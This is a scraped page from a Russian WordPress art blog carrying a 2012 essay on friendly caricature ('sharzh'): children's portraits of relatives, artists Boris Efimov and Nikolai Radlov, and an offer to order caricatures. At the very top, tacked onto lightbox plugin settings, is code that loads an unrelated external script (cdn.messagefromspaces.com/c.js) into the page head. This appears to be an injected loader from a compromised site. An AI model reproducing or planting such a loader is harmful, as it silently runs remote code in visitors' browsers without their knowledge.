, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Шарж

Автор: Дмитрий Алмазов | 31 Июл 2012

ШаржДети дарят нам свои первые рисунки и часто среди них мы находим свои портреты.

Можно сказать, что это шаржи на нашу жизнь, хранимые в семье старшим поколением. Если заглянуть в словарь, то мы вспомним, что это слово происходит от французского  «charge», что значит преувеличение, тяжесть.Добродушно-юмористическое  изображение, портрет человека  попавшего в другую реальность с иными размерами и формами преподносят нам шаржисты.

И все же для многих это жанр изобразительного искусства, возвращающий в детство,  своеобразное фэнтези, соединяющее реальность и преувеличение, выделяющее особые черты внешности, фигуры, манеры поведения человека . Взрослый  художник должен быть хорошим психологом, умеющим подчеркнуть внутренние особенности модели. Добрый юмор изображения вызывает улыбку, не давая повода обидно посмеяться. А дети, изображая  свою семью, стараются подчеркнуть своими рисунками те детали, которые мы, сами того не осознавая, выставляем на показ. Рассматривая такие портреты через много лет, мы испытываем самые разные ощущения: от грусти по ушедшему до тихой радости от того, что на этих цветных картинках сохранился кусочек бесшабашного детства. И тут же приходит на ум чья-то фраза, что дети - самые лучшие психологи. Наши портреты и портреты наших родителей, нарисованные, кажется, 1000 лет назад, лучший тому пример.

Каждый из нас хранит в душе свой образ, отличающийся от действительности, и тем самым, очень дорогой своему создателю. Возможно, он был нарисован именно тогда, в детстве, чтобы вырасти потом в оформившуюся личность со своими мечтами и фантазиями назло суровым будням. Это еще один шарж на реальность, своеобразная попытка сбежать от правды бытия. Можно ли сказать при этом, что такие мастера, как Борис Ефимов и Николай Радлов просто не хотели взрослеть? Об этом нужно спросить у их потомков, до которых, как принято в нашей стране, должны были дойти семейные легенды и притчи о знаменитых родственниках.

У обычных смертных подобное искусство вызывает симпатию, улыбки и радость. Хотя, если задуматься, все, что хотя бы ненадолго возвращает нас в детство, рождает подобные эмоции. Возможно, каждому из нас стоило бы почаще напоминать себе, какие мы на самом деле: где-то наивные, где-то неуклюжие, корчащие рожи и  улыбающиеся по-американски... Дружеские карикатуры высмеивают наши недостатки, но разве нужно делать с ними что-то другое? Смех - это не только лучшее лекарство, но и насущная необходимость в укоряющем темпы жизни мире.

В наше время стало модным приглашать шаржистов на различные значимые мероприятия, это придает пикантность  событию, делая его более запоминающимся, веселым и радостным.

По сути шарж –  это разновидность карикатуры, но  в отличие от нее,

он добродушен,  похож на улыбку, которая может порадовать человека, рассмешить его и даже заставить задуматься над собой.

Это искусство пожалуй сродни литературной эпиграмме -такое же яркое, веселое, вызывающее удивление и радость. Так почему бы не сравнить наши детские рисунки и карикатурный стиль современного мира? В них точно есть что-то общее,  пытающееся сказать нам правду о нас самих.

У нас Вы можете заказать шарж или пригласить шаржиста на мероприятие. Стоимость услуги определяется индивидуально. Воспользуйтесь формой обратной связи на странице контакты.

Темы: Арт Воронеж, Изобразительное искусство, Новости | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress